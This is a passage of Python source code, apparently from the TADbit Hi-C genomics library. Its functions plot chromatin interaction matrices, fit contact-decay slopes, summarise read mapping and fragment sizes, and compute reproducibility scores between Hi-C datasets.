prc = (i / (posF - posI)) / 1.75
pos = norm(np.percentile(vals, i * 100.))
# print '%7.4f %7.4f %7.4f %7.4f' % (prc, pos, np.percentile(vals, i * 100.), i)
cdict['red' ].append([pos, 1 , 1 ])
cdict['green'].append([pos, 1 - prc, 1 - prc])
cdict['blue' ].append([pos, 1 - prc, 1 - prc])
cdict['red' ].append([1.0, 1, 1])
cdict['green'].append([1.0, 0, 0])
cdict['blue' ].append([1.0, 0, 0])
cmap = LinearSegmentedColormap(cmap, cdict)
clim = None
else:
cmap = plt.get_cmap(cmap)
cmap.set_bad('darkgrey', 1)
ax1.imshow(data, interpolation='none',
cmap=cmap, vmin=clim[0] if clim else None, vmax=clim[1] if clim else None)
size1 = len(data)
size2 = len(data[0])
if size1 == size2:
for i in xrange(size1):
for j in xrange(i, size2):
if np.isnan(data[i][j]):
data[i][j] = 0
data[j][i] = 0
else:
for i in xrange(size1):
for j in xrange(size2):
if np.isnan(data[i][j]):
data[i][j] = 0
#data[j][i] = data[i][j]
try:
evals, evect = eigh(data)
sort_perm = evals.argsort()
evect = evect[sort_perm]
except:
evals, evect = None, None
data = [i for d in data for i in d if np.isfinite(i)]
gradient = np.linspace(np.nanmin(data),
np.nanmax(data), max(size1, size2))
gradient = np.vstack((gradient, gradient))
try:
h = ax2.hist(data, color='darkgrey', linewidth=2,
bins=20, histtype='step', density=True)
except AttributeError:
h = ax2.hist(data, color='darkgrey', linewidth=2,
bins=20, histtype='step', normed=True)
_ = ax2.imshow(gradient, aspect='auto', cmap=cmap,
vmin=clim[0] if clim else None, vmax=clim[1] if clim else None,
extent=(np.nanmin(data), np.nanmax(data) , 0, max(h[0])))
if genome_seq:
for crm in genome_seq:
ax1.vlines([cumcs[crm][0]-.5, cumcs[crm][1]-.5], cumcs[crm][0]-.5, cumcs[crm][1]-.5,
color='w', linestyle='-', linewidth=1, alpha=1)
ax1.hlines([cumcs[crm][1]-.5, cumcs[crm][0]-.5], cumcs[crm][0]-.5, cumcs[crm][1]-.5,
color='w', linestyle='-', linewidth=1, alpha=1)
ax1.vlines([cumcs[crm][0]-.5, cumcs[crm][1]-.5], cumcs[crm][0]-.5, cumcs[crm][1]-.5,
color='k', linestyle='--')
ax1.hlines([cumcs[crm][1]-.5, cumcs[crm][0]-.5], cumcs[crm][0]-.5, cumcs[crm][1]-.5,
color='k', linestyle='--')
if not one:
vals = [0]
keys = ['']
for crm in genome_seq:
vals.append(cumcs[crm][0])
keys.append(crm)
vals.append(cumcs[crm][1])
ax1.set_yticks(vals)
ax1.set_yticklabels('')
ax1.set_yticks([float(vals[i]+vals[i+1])/2
for i in xrange(len(vals) - 1)], minor=True)
ax1.set_yticklabels(keys, minor=True)
for t in ax1.yaxis.get_minor_ticks():
t.tick1On = False
t.tick2On = False
# totaloridata = ''.join([j + ('' if (i+1)%3 else ',') for i, j in enumerate(str(totaloridata)[::-1])])[::-1].strip(',')
# minoridata = ''.join([j + ('' if (i+1)%3 else ',') for i, j in enumerate(str(minoridata)[::-1])])[::-1].strip(',')
# maxoridata = ''.join([j + ('' if (i+1)%3 else ',') for i, j in enumerate(str(maxoridata)[::-1])])[::-1].strip(',')
plt.figtext(0.05,0.25, ''.join([
(name + '\n') if name else '',
'Number of interactions: %s\n' % str(totaloridata),
('' if np.isnan(cistrans) else
('Percentage of cis interactions: %.0f%%\n' % (cistrans*100))),
'Min interactions: %s\n' % (minoridata),
'Max interactions: %s\n' % (maxoridata)]))
ax2.set_xlim((np.nanmin(data), np.nanmax(data)))
ax2.set_ylim((0, max(h[0])))
ax1.set_xlim ((-0.5, size1 - .5))
ax1.set_ylim ((-0.5, size2 - .5))
ax2.set_xlabel('log interaction count')
# we reduce the number of dots displayed.... we just want to see the shape
subdata = np.array(list(set([float(int(d*100))/100 for d in data])))
try:
normfit = sc_norm.pdf(subdata, np.nanmean(data), np.nanstd(data))
except AttributeError:
normfit = sc_norm.pdf(subdata, np.mean(data), np.std(data))
ax2.plot(subdata, normfit, 'w.', markersize=2.5, alpha=.4)
ax2.plot(subdata, normfit, 'k.', markersize=1.5, alpha=1)
ax2.set_title('skew: %.3f, kurtosis: %.3f' % (skew(data),
kurtosis(data)))
try:
ax4.vlines(range(size1), 0, evect[:,-1], color='k')
except (TypeError, IndexError):
pass
ax4.hlines(0, 0, size2, color='red')
ax4.set_ylabel('E1')
ax4.set_yticklabels([])
try:
ax5.vlines(range(size1), 0, evect[:,-2], color='k')
except (TypeError, IndexError):
pass
ax5.hlines(0, 0, size2, color='red')
ax5.set_ylabel('E2')
ax5.set_yticklabels([])
try:
ax6.vlines(range(size1), 0, evect[:,-3], color='k')
except (TypeError, IndexError):
pass
ax6.hlines(0, 0, size2, color='red')
ax6.set_ylabel('E3')
ax6.set_yticklabels([])
xticklabels = ax4.get_xticklabels() + ax5.get_xticklabels() + ax6.get_xticklabels()
plt.setp(xticklabels, visible=False)
if savefig:
tadbit_savefig(savefig)
elif show:
plt.show()
plt.close('all')
def plot_distance_vs_interactions(data, min_diff=1, max_diff=1000, show=False,
genome_seq=None, resolution=None, axe=None,
savefig=None, normalized=False,
plot_each_cell=False):
"""
Plot the number of interactions observed versus the genomic distance between
the mapped ends of the read. The slope is expected to be around -1, in
logarithmic scale and between 700 kb and 10 Mb (according to the prediction
of the fractal globule model).
:param data: input file name (either tsv or TADbit generated BAM), or
HiC_data object or list of lists
    :param 1 min_diff: lower limit (in number of bins)
:param 1000 max_diff: upper limit (in number of bins) to look for
    :param None resolution: group reads that are closer than this resolution
parameter
    :param False plot_each_cell: if false, only the mean distances by bin
will be represented, otherwise each pair of interactions will be plotted.
:param None axe: a matplotlib.axes.Axes object to define the plot
appearance
:param None savefig: path to a file where to save the image generated;
if None, the image will be shown using matplotlib GUI (the extension
of the file name will determine the desired format).
:returns: slope, intercept and R square of each of the 3 correlations
"""
if isinstance(data, basestring):
resolution = resolution or 1
dist_intr = dict([(i, {})
for i in xrange(min_diff, max_diff)])
fhandler = open(data)
line = fhandler.next()
while line.startswith('#'):
line = fhandler.next()
try:
while True:
_, cr1, ps1, _, _, _, _, cr2, ps2, _ = line.split('\t', 9)
if cr1 != cr2:
line = fhandler.next()
continue
diff = abs(int(ps1) / resolution - int(ps2) / resolution)
if max_diff > diff >= min_diff:
try:
dist_intr[diff][int(ps1) / resolution] += 1.
except KeyError:
dist_intr[diff][int(ps1) / resolution] = 1.
line = fhandler.next()
except StopIteration:
pass
fhandler.close()
for diff in dist_intr:
dist_intr[diff] = [dist_intr[diff].get(k, 0)
for k in xrange(max(dist_intr[diff]) - diff)]
elif isinstance(data, HiC_data):
resolution = resolution or data.resolution
dist_intr = dict([(i, []) for i in xrange(min_diff, max_diff)])
if normalized:
get_data = lambda x, y: data[x, y] / data.bias[x] / data.bias[y]
else:
get_data = lambda x, y: data[x, y]
max_diff = min(len(data), max_diff)
if data.section_pos:
for crm in data.section_pos:
for diff in xrange(min_diff, min(
(max_diff, 1 + data.chromosomes[crm]))):
for i in xrange(data.section_pos[crm][0],
data.section_pos[crm][1] - diff):
dist_intr[diff].append(get_data(i, i + diff))
else:
for diff in xrange(min_diff, max_diff):
for i in xrange(len(data) - diff):
if not np.isnan(data[i, i + diff]):
                        dist_intr[diff].append(get_data(i, i + diff))
elif isinstance(data, dict): # if we pass decay/expected dictionary, computes weighted mean
dist_intr = {}
for i in range(min_diff, max_diff):
val = [data[c][i] for c in data
if i in data[c] and data[c][i] != data[c].get(i-1, 0)]
if val:
dist_intr[i] = [sum(val) / float(len(val))]
else:
dist_intr[i] = [0]
else:
dist_intr = dict([(i, []) for i in xrange(min_diff, max_diff)])
if genome_seq:
max_diff = min(max(genome_seq.values()), max_diff)
cnt = 0
for crm in genome_seq:
for diff in xrange(min_diff, min(
(max_diff, genome_seq[crm]))):
for i in xrange(cnt, cnt + genome_seq[crm] - diff):
if not np.isnan(data[i][i + diff]):
dist_intr[diff].append(data[i][i + diff])
cnt += genome_seq[crm]
else:
max_diff = min(len(data), max_diff)
for diff in xrange(min_diff, max_diff):
for i in xrange(len(data) - diff):
if not np.isnan(data[i][i + diff]):
dist_intr[diff].append(data[i][i + diff])
resolution = resolution or 1
if not axe:
fig=plt.figure()
axe = fig.add_subplot(111)
    # remove the last part of the plot in case no interactions are counted... reduce max_diff
for diff in xrange(max_diff - 1, min_diff, -1):
try:
if not dist_intr[diff]:
del(dist_intr[diff])
max_diff -=1
continue
except KeyError:
max_diff -=1
continue
break
    # get the mean value per bin
mean_intr = dict([(i, float(sum(dist_intr[i])) / len(dist_intr[i]))
for i in dist_intr if len(dist_intr[i])])
if plot_each_cell:
xp, yp = [], []
for x, y in sorted(dist_intr.items(), key=lambda x:x[0]):
xp.extend([x] * len(y))
yp.extend(y)
x = []
y = []
for k in xrange(len(xp)):
if yp[k]:
x.append(xp[k])
y.append(yp[k])
axe.plot(x, y, color='grey', marker='.', alpha=0.1, ms=1,
linestyle='None')
xp, yp = zip(*sorted(mean_intr.items(), key=lambda x:x[0]))
x = []
y = []
for k in xrange(len(xp)):
if yp[k]:
x.append(xp[k])
y.append(yp[k])
axe.plot(x, y, 'k.', alpha=0.4)
best = (float('-inf'), 0, 0, 0, 0, 0, 0, 0, 0, 0)
logx = np.log(x)
logy = np.log(y)
ntries = 100
# set k for better fit
# for k in xrange(1, ntries/5, ntries/5/5):
if resolution == 1:
k = 1
for i in xrange(3, ntries-2-k):
v1 = i * len(x) / ntries
try:
a1, b1, r21, _, _ = linregress(logx[ :v1], logy[ :v1])
except ValueError:
a1 = b1 = r21 = 0
r21 *= r21
for j in xrange(i + 1 + k, ntries - 2 - k):
v2 = j * len(x) / ntries
try:
a2, b2, r22, _, _ = linregress(logx[v1+k:v2], logy[v1+k:v2])
a3, b3, r23, _, _ = linregress(logx[v2+k: ], logy[v2+k: ])
except ValueError:
a2 = b2 = r22 = 0
a3 = b3 = r23 = 0
r2 = r21 + r22**2 + r23**2
if r2 > best[0]:
best = (r2, v1, v2, a1, a2, a3,
b1, b2, b3, k)
# plot line of best fit
(v1, v2,
a1, a2, a3,
b1, b2, b3, k) = best[1:]
yfit1 = lambda xx: np.exp(b1 + a1*np.array (np.log(xx)))
yfit2 = lambda xx: np.exp(b2 + a2*np.array (np.log(xx)))
yfit3 = lambda xx: np.exp(b3 + a3*np.array (np.log(xx)))
axe.plot(x[ :v1], yfit1(x[ :v1] ), color= 'yellow', lw=2,
label = r'$\alpha_{%s}=%.2f$' % (
'0-0.7 \mathrm{ Mb}' if resolution != 1 else '1', a1))
#label = r'$\alpha_1=%.2f$ (0-%d)' % (a1, x[v1]))
axe.plot(x[v1+k:v2], yfit2(x[v1+k:v2]), color= 'orange', lw=2,
label = r'$\alpha_{%s}=%.2f$' % (
'0.7-10 \mathrm{ Mb}' if resolution != 1 else '2', a2))
# label = r'$\alpha_2=%.2f$ (%d-%d)' % (a2, x[v1], x[v2]))
axe.plot(x[v2+k: ], yfit3(x[v2+k: ] ), color= 'red' , lw=2,
label = r'$\alpha_{%s}=%.2f$' % (
'10 \mathrm{ Mb}-\infty' if resolution != 1 else '3', a3))
# label = r'$\alpha_3=%.2f$ (%d-$\infty$)' % (a3, x[v2+k]))
else:
# from 0.7 Mb
v1 = 700000 / resolution
# to 10 Mb
v2 = 10000000 / resolution
try:
a1, b1, r21, _, _ = linregress(logx[ :v1], logy[ :v1])
except ValueError:
a1, b1, r21 = 0, 0, 0
try:
a2, b2, r22, _, _ = linregress(logx[v1:v2], logy[v1:v2])
except ValueError:
a2, b2, r22 = 0, 0, 0
try:
a3, b3, r23, _, _ = linregress(logx[v2: ], logy[v2: ])
except ValueError:
a3, b3, r23 = 0, 0, 0
yfit1 = lambda xx: np.exp(b1 + a1*np.array (np.log(xx)))
yfit2 = lambda xx: np.exp(b2 + a2*np.array (np.log(xx)))
yfit3 = lambda xx: np.exp(b3 + a3*np.array (np.log(xx)))
axe.plot(x[ :v1], yfit1(x[ :v1] ), color= 'yellow', lw=2,
label = r'$\alpha_{%s}=%.2f$' % (
'0-0.7 \mathrm{ Mb}' if resolution != 1 else '1', a1))
#label = r'$\alpha_1=%.2f$ (0-%d)' % (a1, x[v1]))
axe.plot(x[v1:v2], yfit2(x[v1:v2]), color= 'orange', lw=2,
label = r'$\alpha_{%s}=%.2f$' % (
'0.7-10 \mathrm{ Mb}' if resolution != 1 else '2', a2))
# label = r'$\alpha_2=%.2f$ (%d-%d)' % (a2, x[v1], x[v2]))
axe.plot(x[v2: ], yfit3(x[v2: ] ), color= 'red' , lw=2,
label = r'$\alpha_{%s}=%.2f$' % (
'10 \mathrm{ Mb}-\infty' if resolution != 1 else '3', a3))
# label = r'$\alpha_3=%.2f$ (%d-$\infty$)' % (a3, x[v2+k]))
axe.set_ylabel('Log interaction count')
axe.set_xlabel('Log genomic distance (resolution: %s)' % nicer(resolution))
axe.legend(loc='lower left', frameon=False)
axe.set_xscale('log')
axe.set_yscale('log')
axe.set_xlim((min_diff, max_diff))
try:
axe.set_ylim((0, max(y)))
except ValueError:
pass
if savefig:
tadbit_savefig(savefig)
plt.close('all')
elif show:
plt.show()
plt.close('all')
return (a1, b1, r21), (a2, b2, r22), (a3, b3, r23)
def plot_iterative_mapping(fnam1, fnam2, total_reads=None, axe=None, savefig=None):
"""
Plots the number of reads mapped at each step of the mapping process (in the
case of the iterative mapping, each step is mapping process with a given
size of fragments).
    :param fnam1: input file name for the first read-end
    :param fnam2: input file name for the second read-end
:param total_reads: total number of reads in the initial FASTQ file
:param None axe: a matplotlib.axes.Axes object to define the plot
appearance
:param None savefig: path to a file where to save the image generated;
if None, the image will be shown using matplotlib GUI (the extension
of the file name will determine the desired format).
:returns: a dictionary with the number of reads per mapped length
"""
count_by_len = {}
total_reads = total_reads or 1
if not axe:
fig=plt.figure()
_ = fig.add_subplot(111)
colors = ['olive', 'darkcyan']
iteration = False
for i, fnam in enumerate([fnam1, fnam2]):
fhandler = open(fnam)
line = fhandler.next()
count_by_len[i] = {}
while line.startswith('#'):
if line.startswith('# MAPPED '):
itr, num = line.split()[2:]
count_by_len[i][int(itr)] = int(num)
line = fhandler.next()
if not count_by_len[i]:
iteration = True
try:
while True:
_, length, _, _ = line.rsplit('\t', 3)
try:
count_by_len[i][int(length)] += 1
except KeyError:
count_by_len[i][int(length)] = 1
line = fhandler.next()
except StopIteration:
pass
fhandler.close()
lengths = sorted(count_by_len[i].keys())
for k in lengths[::-1]:
count_by_len[i][k] += sum([count_by_len[i][j]
for j in lengths if j < k])
plt.plot(lengths, [float(count_by_len[i][l]) / total_reads
for l in lengths],
label='read' + str(i + 1), linewidth=2, color=colors[i])
if iteration:
plt.xlabel('read length (bp)')
else:
plt.xlabel('Iteration number')
if total_reads != 1:
plt.ylabel('Proportion of mapped reads')
else:
plt.ylabel('Number of mapped reads')
plt.legend(loc=4)
if savefig:
tadbit_savefig(savefig)
elif not axe:
plt.show()
plt.close('all')
return count_by_len
def fragment_size(fnam, savefig=None, nreads=None, max_size=99.9, axe=None,
show=False, xlog=False, stats=('median', 'perc_max'),
too_large=10000):
"""
Plots the distribution of dangling-ends lengths
:param fnam: input file name
:param None savefig: path where to store the output images.
:param 99.9 max_size: top percentage of distances to consider, within the
top 0.01% are usually found very long outliers.
:param False xlog: represent x axis in logarithmic scale
:param ('median', 'perc_max') stats: returns this set of values calculated from the
distribution of insert/fragment sizes. Possible values are:
- 'median' median of the distribution
- 'mean' mean of the distribution
       - 'perc_max' percentile defined by the other parameter 'max_size'
       - 'first_decay' starting from the median of the distribution, the
         first window where 10 consecutive insert sizes are each counted less
         than a given cutoff (this cutoff is equal to the total number of
         fragments divided by 100 000)
       - 'MAD' right-tail double median absolute deviation
:param 10000 too_large: upper bound limit for fragment size to consider
:param None nreads: number of reads to process (default: all reads)
    :returns: the median value and the percentile given as max_size.
"""
distr = {}
genome_seq = OrderedDict()
pos = 0
fhandler = open(fnam)
for line in fhandler:
if line.startswith('#'):
if line.startswith('# CRM '):
crm, clen = line[6:].split('\t')
genome_seq[crm] = int(clen)
else:
break
pos += len(line)
fhandler.seek(pos)
des = []
for line in fhandler:
(crm1, pos1, dir1, _, re1, _,
crm2, pos2, dir2, _, re2) = line.strip().split('\t')[1:12]
if re1 == re2 and crm1 == crm2 and dir1 == '1' and dir2 == '0':
pos1, pos2 = int(pos1), int(pos2)
des.append(pos2 - pos1)
if len(des) == nreads:
break
des = [i for i in des if i <= too_large]
fhandler.close()
if not des:
raise Exception('ERROR: no dangling-ends found in %s' % (fnam))
max_perc = np.percentile(des, max_size)
perc99 = np.percentile(des, 99)
perc01 = np.percentile(des, 1)
perc50 = np.percentile(des, 50)
meanfr = np.mean(des)
perc95 = np.percentile(des, 95)
perc05 = np.percentile(des, 5)
to_return = {'median': perc50}
cutoff = len(des) / 100000.
count = 0
for v in xrange(int(perc50), int(max(des))):
if des.count(v) < cutoff:
count += 1
else:
count = 0
if count >= 10:
to_return['first_decay'] = v - 10
break
else:
raise Exception('ERROR: not found')
to_return['perc_max'] = max_perc
to_return['MAD'] = mad(des)
to_return['mean'] = meanfr
if not savefig and not axe and not show:
return [to_return[k] for k in stats]
ax = setup_plot(axe, figsize=(10, 5.5))
desapan = ax.axvspan(perc95, perc99, facecolor='black', alpha=.2,
label='1-99%% DEs\n(%.0f-%.0f nts)' % (perc01, perc99))
ax.axvspan(perc01, perc05, facecolor='black', alpha=.2)
desapan = ax.axvspan(perc05, perc95, facecolor='black', alpha=.4,
label='5-95%% DEs\n(%.0f-%.0f nts)' % (perc05, perc95))
deshist = ax.hist(des, bins=100, range=(0, max_perc), lw=2,
alpha=.5, edgecolor='darkred', facecolor='darkred', label='Dangling-ends')
ylims = ax.get_ylim()
plots = []
ax.set_xlabel('Genomic distance between reads')
ax.set_ylabel('Count')
ax.set_title('Distribution of dangling-ends ' +
                 'lengths\nmedian: %s (mean: %s), top %.1f%%: %0.f nts' % (
int(perc50), int(meanfr), max_size, int(max_perc)))
if xlog:
ax.set_xscale('log')
ax.set_xlim((50, max_perc))
plt.subplots_adjust(left=0.1, right=0.75)
ax.legend(bbox_to_anchor=(1.4, 1), frameon=False)
if savefig:
tadbit_savefig(savefig)
elif show and not axe:
plt.show()
plt.close('all')
return [to_return[k] for k in stats]
def plot_genomic_distribution(fnam, first_read=None, resolution=10000,
ylim=None, yscale=None, savefig=None, show=False,
savedata=None, chr_names=None, nreads=None):
"""
Plot the number of reads in bins along the genome (or along a given
chromosome).
:param fnam: input file name
    :param None first_read: deprecated parameter, ignored
    :param 10000 resolution: group reads that are closer than this resolution
       parameter
:param None ylim: a tuple of lower and upper bound for the y axis
    :param None yscale: if set to "log", values will be represented in
       logarithmic scale
:param None savefig: path to a file where to save the image generated;
if None, the image will be shown using matplotlib GUI (the extension
of the file name will determine the desired format).
:param None savedata: path where to store the output read counts per bin.
    :param None chr_names: can pass a list of chromosome names in case only some
       of them need to be plotted (this option may take longer than the default)
:param None nreads: number of reads to process (default: all reads)
"""
if first_read:
        warn('WARNING: first_read parameter should no longer be used.')
distr = {}
genome_seq = OrderedDict()
if chr_names:
chr_names = set(chr_names)
cond1 = lambda x: x not in chr_names
else:
cond1 = lambda x: False
if nreads:
cond2 = lambda x: x >= nreads
else:
cond2 = lambda x: False
cond = lambda x, y: cond1(x) or cond2(y)
count = 0
pos = 0
fhandler = open(fnam)
for line in fhandler:
if line.startswith('#'):
if line.startswith('# CRM '):
crm, clen = line[6:].split('\t')
genome_seq[crm] = int(clen)
else:
break
pos += len(line)
fhandler.seek(pos)
for line in fhandler:
line = line.strip().split('\t')
count += 1
for idx1, idx2 in ((1, 3), (7, 9)):
crm, pos = line[idx1:idx2]
if cond(crm, count):
if cond2(count):
break
continue
pos = int(pos) / resolution
try:
distr[crm][pos] += 1
except KeyError:
try:
distr[crm][pos] = 1
except KeyError:
distr[crm] = {pos: 1}
else:
continue
break
fhandler.close()
if savefig or show:
_ = plt.figure(figsize=(15, 1 + 3 * len(
chr_names if chr_names else distr.keys())))
max_y = max([max(distr[c].values()) for c in distr])
max_x = max([len(distr[c].values()) for c in distr])
ncrms = len(chr_names if chr_names else genome_seq if genome_seq else distr)
data = {}
for i, crm in enumerate(chr_names if chr_names else genome_seq
if genome_seq else distr):
try:
# data[crm] = [distr[crm].get(j, 0) for j in xrange(max(distr[crm]))] # genome_seq[crm]
data[crm] = [distr[crm].get(j, 0)
for j in xrange(genome_seq[crm] / resolution + 1)]
if savefig or show:
plt.subplot(ncrms, 1, i + 1)
plt.plot(range(genome_seq[crm] / resolution + 1), data[crm],
color='red', lw=1.5, alpha=0.7)
if yscale:
plt.yscale(yscale)
except KeyError:
pass
if savefig or show:
if ylim:
plt.vlines(genome_seq[crm] / resolution, ylim[0], ylim[1])
else:
plt.vlines(genome_seq[crm] / resolution, 0, max_y)
plt.xlim((0, max_x))
plt.ylim(ylim or (0, max_y))
plt.title(crm)
if savefig:
tadbit_savefig(savefig)
if not show:
plt.close('all')
elif show:
plt.show()
if savedata:
out = open(savedata, 'w')
out.write('# CRM\tstart-end\tcount\n')
out.write('\n'.join('%s\t%d-%d\t%d' % (c, (i * resolution) + 1,
((i + 1) * resolution), v)
for c in data for i, v in enumerate(data[c])))
out.write('\n')
out.close()
def _unitize(vals):
return np.argsort(vals) / float(len(vals))
def correlate_matrices(hic_data1, hic_data2, max_dist=10, intra=False, axe=None,
savefig=None, show=False, savedata=None, min_dist=1,
normalized=False, remove_bad_columns=True, **kwargs):
"""
Compare the interactions of two Hi-C matrices at a given distance,
with Spearman rank correlation.
Also computes the SCC reproducibility score as in HiCrep (see
    https://doi.org/10.1101/gr.220640.117). Its implementation is inspired
by the version implemented in dryhic by Enrique Vidal
(https://github.com/qenvio/dryhic).
:param hic_data1: Hi-C-data object
:param hic_data2: Hi-C-data object
:param 1 resolution: to be used for scaling the plot
    :param 10 max_dist: maximum distance from diagonal (e.g. 10 means we will
not look further than 10 times the resolution)
:param 1 min_dist: minimum distance from diagonal (set to 0 to reproduce
result from HicRep)
:param None savefig: path to save the plot
:param False intra: only takes into account intra-chromosomal contacts
:param False show: displays the plot
:param False normalized: use normalized data
    :param True remove_bad_columns: computes the union of bad columns between
       samples and excludes them from the comparison
:returns: list of correlations, list of genomic distances, SCC and standard
deviation of SCC
"""
spearmans = []
pearsons = []
dists = []
weigs = []
if normalized:
get_the_guy1 = lambda i, j: (hic_data1[j, i] / hic_data1.bias[i] /
hic_data1.bias[j])
get_the_guy2 = lambda i, j: (hic_data2[j, i] / hic_data2.bias[i] /
hic_data2.bias[j])
else:
get_the_guy1 = lambda i, j: hic_data1[j, i]
get_the_guy2 = lambda i, j: hic_data2[j, i]
if remove_bad_columns:
# union of bad columns
bads = hic_data1.bads.copy()
bads.update(hic_data2.bads)
if (intra and hic_data1.sections and hic_data2.sections and
hic_data1.sections == hic_data2.sections):
for dist in xrange(1, max_dist + 1):
diag1 = []
diag2 = []
for crm in hic_data1.section_pos:
for j in xrange(hic_data1.section_pos[crm][0],
hic_data1.section_pos[crm][1] - dist):
i = j + dist
if j in bads or i in bads:
continue
diag1.append(get_the_guy1(i, j))
diag2.append(get_the_guy2(i, j))
spearmans.append(spearmanr(diag1, diag2)[0])
            pearsons.append(pearsonr(diag1, diag2)[0])
r1 = _unitize(diag1)
r2 = _unitize(diag2)
weigs.append((np.var(r1, ddof=1) *
np.var(r2, ddof=1))**0.5 * len(diag1))
dists.append(dist)
else:
if intra:
            warn('WARNING: hic_data does not contain chromosome coordinates, ' +
'intra set to False')
for dist in xrange(min_dist, max_dist + min_dist):
diag1 = []
diag2 = []
for j in xrange(len(hic_data1) - dist):
i = j + dist
if j in bads or i in bads:
continue
diag1.append(get_the_guy1(i, j))
diag2.append(get_the_guy2(i, j))
spearmans.append(spearmanr(diag1, diag2)[0])
pearsons.append(pearsonr(diag1, diag2)[0])
r1 = _unitize(diag1)
r2 = _unitize(diag2)
weigs.append((np.var(r1, ddof=1) *
np.var(r2, ddof=1))**0.5 * len(diag1))
dists.append(dist)
# compute scc
# print pearsons
# print weigs
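    # SCC is the weighted average of the per-distance Pearson correlations
    # (as in HiCrep): SCC = sum_d(w_d * r_d) / sum_d(w_d), with weights
    # w_d = N_d * sqrt(var(rank1_d) * var(rank2_d)) computed above.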
tot_weigth = sum(weigs)
scc = sum(pearsons[i] * weigs[i] / tot_weigth
for i in xrange(len(pearsons)))
var_corr = np.var(pearsons, ddof=1)
std = (sum(weigs[i]**2 for i in xrange(len(pearsons))) * var_corr /
sum(weigs)**2)**0.5
# plot
if show or savefig or axe:
if not axe:
fig = plt.figure()
axe = fig.add_subplot(111)
given_axe = False
else:
given_axe = True
axe.plot(dists, spearmans, color='orange', linewidth=3, alpha=.8)
axe.set_xlabel('Genomic distance in bins')
axe.set_ylabel('Spearman rank correlation')
axe.set_xlim((0, dists[-1]))
if savefig:
tadbit_savefig(savefig)
if show:
plt.show()
if not given_axe:
plt.close('all')
if savedata:
out = open(savedata, 'w')
out.write('# genomic distance\tSpearman rank correlation\n')
for i in xrange(len(spearmans)):
out.write('%s\t%s\n' % (dists[i], spearmans[i]))
out.close()
if kwargs.get('get_bads', False):
return spearmans, dists, scc, std, bads
return spearmans, dists, scc, std
def _evec_dist(v1,v2):
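    # distance between two eigenvectors up to a global sign flip:
    # min(||v1 - v2||, ||v1 + v2||)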
d1=np.dot(v1-v2,v1-v2)
d2=np.dot(v1+v2,v1+v2)
if d1<d2:
d=d1
else:
d=d2
return np.sqrt(d)
def _get_Laplacian(M):
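    # symmetric normalized Laplacian, I - D^-1/2 M D^-1/2, restricted to
    # rows/columns with a non-zero sum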
S=M.sum(1)
i_nz=np.where(S>0)[0]
S=S[i_nz]
M=(M[i_nz].T)[i_nz].T
S=1/np.sqrt(S)
M=S*M
M=(S*M.T).T
n=np.size(S)
M=np.identity(n)-M
M=(M+M.T)/2
return M
def get_ipr(evec):
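    # inverse participation ratio, 1 / sum_i(v_i^4): large values correspond to
    # eigenvectors spread over many bins rather than localized on a few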
ipr=1.0/(evec*evec*evec*evec).sum()
return ipr
def get_reproducibility(hic_data1, hic_data2, num_evec, verbose=True,
normalized=False, remove_bad_columns=True):
"""
Compute reproducibility score similarly to HiC-spector
(https://doi.org/10.1093/bioinformatics/btx152)
:param hic_data1: Hi-C-data object
:param hic_data2: Hi-C-data object
:param 20 num_evec: number of eigenvectors to compare
    :returns: reproducibility score (below 0.5 ~ different cell types)
"""
M1 = hic_data1.get_matrix(normalized=normalized)
M2 = hic_data2.get_matrix(normalized=normalized)
if remove_bad_columns:
# union of bad columns
bads = hic_data1.bads.copy()
bads.update(hic_data2.bads)
# remove them form both matrices
for bad in sorted(bads, reverse=True):
del(M1[bad])
del(M2[bad])
for i in xrange(len(M1)):
_ = M1[i].pop(bad)
_ = M2[i].pop(bad)
M1 = np.matrix(M1)
M2 = np.matrix(M2)
    k1 = np.sign(M1.A).sum(1)
    d1 = np.diag(M1.A)
    kd1 = ~((k1 == 1) * (d1 > 0))
    k2 = np.sign(M2.A).sum(1)
    d2 = np.diag(M2.A)
    kd2 = ~((k2 == 1) * (d2 > 0))
    iz = np.nonzero((k1 + k2 > 0) * (kd1 > 0) * (kd2 > 0))[0]
    M1b = (M1[iz].A.T)[iz].T
    M2b = (M2[iz].A.T)[iz].T
    i_nz1 = np.where(M1b.sum(1) > 0)[0]
    i_nz2 = np.where(M2b.sum(1) > 0)[0]
    i_z1 = np.where(M1b.sum(1) == 0)[0]
    i_z2 = np.where(M2b.sum(1) == 0)[0]
    M1b_L = _get_Laplacian(M1b)
    M2b_L = _get_Laplacian(M2b)
    a1, b1 = eigsh(M1b_L, k=num_evec, which="SM")
    a2, b2 = eigsh(M2b_L, k=num_evec, which="SM")
    b1_extend = np.zeros((np.size(M1b, 0), num_evec))
    b2_extend = np.zeros((np.size(M2b, 0), num_evec))
    for i in range(num_evec):
        b1_extend[i_nz1, i] = b1[:, i]
        b2_extend[i_nz2, i] = b2[:, i]
    ipr_cut = 5
    ipr1 = np.zeros(num_evec)
    ipr2 = np.zeros(num_evec)
    for i in range(num_evec):
        ipr1[i] = get_ipr(b1_extend[:, i])
        ipr2[i] = get_ipr(b2_extend[:, i])
    b1_extend_eff = b1_extend[:, ipr1 > ipr_cut]
    b2_extend_eff = b2_extend[:, ipr2 > ipr_cut]
    num_evec_eff = min(np.size(b1_extend_eff, 1), np.size(b2_extend_eff, 1))
    evd = np.zeros(num_evec_eff)
    for i in range(num_evec_eff):
        evd[i] = _evec_dist(b1_extend_eff[:, i], b2_extend_eff[:, i])
    Sd = evd.sum()
    l = np.sqrt(2)
    evs = abs(l - Sd / num_evec_eff) / l
N = float(M1.shape[1])
if verbose:
if (np.sum(ipr1>N/100)<=1)|(np.sum(ipr2>N/100)<=1):
print("at least one of the maps does not look like typical Hi-C maps")
else:
print("size of maps: %d" %(np.size(M1,0)))
print("reproducibility score: %6.3f " %(evs))
print("num_evec_eff: %d" %(num_evec_eff))
return evs
def eig_correlate_matrices(hic_data1, hic_data2, nvect=6, normalized=False,
savefig=None, show=False, savedata=None,
remove_bad_columns=True, **kwargs):
"""
Compare the interactions of two Hi-C matrices using their 6 first
eigenvectors, with Pearson correlation
:param hic_data1: Hi-C-data object
:param hic_data2: Hi-C-data object
:param 6 nvect: number of eigenvectors to compare
:param None savefig: path to save the plot
:param False show: displays the plot
:param False normalized: use normalized data
    :param True remove_bad_columns: computes the union of bad columns between
       samples and excludes them from the comparison
:param kwargs: any argument to pass to matplotlib imshow function
:returns: matrix of correlations
"""
data1 = hic_data1.get_matrix(normalized=normalized)
data2 = hic_data2.get_matrix(normalized=normalized)
## reduce matrices to remove bad columns
if remove_bad_columns:
# union of bad columns
bads = hic_data1.bads.copy()
bads.update(hic_data2.bads)
# remove them form both matrices
